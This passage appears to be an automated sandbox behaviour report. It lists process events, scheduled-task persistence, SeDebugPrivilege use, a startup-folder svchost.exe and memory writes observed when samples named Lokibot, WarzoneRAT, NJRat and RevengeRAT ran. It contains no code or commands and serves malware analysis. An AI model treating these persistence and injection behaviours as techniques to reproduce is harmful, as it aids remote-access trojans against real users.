File opened for modification C:\Users\Admin\Downloads\Unconfirmed 185813.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
N/A N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
N/A N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
N/A N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\RevengeRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\RevengeRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\RevengeRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\RevengeRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\NJRat.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\NJRat.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2948 wrote to memory of 4808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
